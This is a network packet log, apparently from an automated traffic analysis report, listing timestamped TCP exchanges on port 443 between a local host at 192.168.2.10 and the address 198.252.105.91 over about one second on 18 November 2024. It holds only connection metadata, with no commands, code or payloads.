                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.437453985 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.437570095 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.437577963 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.437772036 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.486433029 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.486454010 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.486573935 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.486588955 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.486706972 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554294109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554348946 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554431915 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554431915 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554449081 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554660082 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554666042 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554692984 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554744959 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554750919 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554795027 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.554795027 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.555892944 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.555937052 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.555968046 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.555994987 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.556026936 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.556034088 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.605158091 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.605187893 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.605281115 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.605293989 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.605341911 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.634031057 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.634059906 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.634136915 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.634150028 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.634260893 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673296928 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673322916 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673432112 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673435926 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673451900 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673506021 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673516035 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673563957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673571110 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.673666954 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.674666882 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.674685955 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.674725056 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.674734116 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.674770117 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.674779892 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.723695993 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.723723888 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.723772049 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.723786116 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.723823071 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.723843098 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.752923012 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.752962112 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.753020048 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.753034115 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.753073931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.753073931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792170048 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792198896 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792287111 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792309046 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792510986 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792529106 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792537928 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792555094 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792587042 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792632103 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793576956 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793592930 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793652058 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793665886 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793751955 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.833825111 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.833858967 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.834012032 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.834031105 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.834201097 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871825933 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871896982 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871948957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871948957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.871969938 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.872019053 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911453962 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911521912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911564112 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911576033 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911588907 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911631107 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911649942 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911700964 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911875963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911875963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911884069 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.911940098 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912204027 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912245035 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912302971 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912311077 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912337065 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912430048 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912915945 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.912956953 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913080931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913080931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913089991 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.913146973 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961273909 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961344004 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961447001 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961447001 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961466074 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.961556911 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021403074 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021459103 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021641016 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021641016 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.021660089 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.022038937 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030360937 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030409098 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030548096 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030548096 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030555964 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030661106 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030741930 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030792952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030898094 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.030905962 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031039953 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031039953 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031339884 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031385899 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031426907 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031434059 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031457901 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.031549931 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.079829931 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.079866886 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.080017090 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.080029011 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.080087900 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.108957052 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.109013081 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.109121084 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.109129906 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.109181881 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.109199047 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.148652077 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.148705006 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.148822069 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.148838997 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.148889065 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.148889065 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149039984 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149084091 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149199963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149208069 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149302006 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149712086 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149759054 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149789095 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149796009 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149842978 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.149842978 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.150243998 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.150286913 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.150372982 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.150372982 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.150381088 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.153435946 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.198506117 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.198559046 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.198689938 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.198707104 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.198791981 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.198791981 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.227500916 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.227556944 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.227629900 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.227642059 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.227684975 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.227705956 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267352104 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267384052 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267543077 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267556906 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267602921 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267635107 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267641068 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267656088 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267678022 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.267739058 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268173933 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268199921 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268292904 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268292904 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268300056 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268727064 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268749952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268825054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268825054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268832922 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.268946886 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317159891 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317197084 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317270041 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317281008 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317317963 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317353010 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317375898 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317385912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317404985 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317441940 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.317461967 CET49731443192.168.2.10198.252.105.91
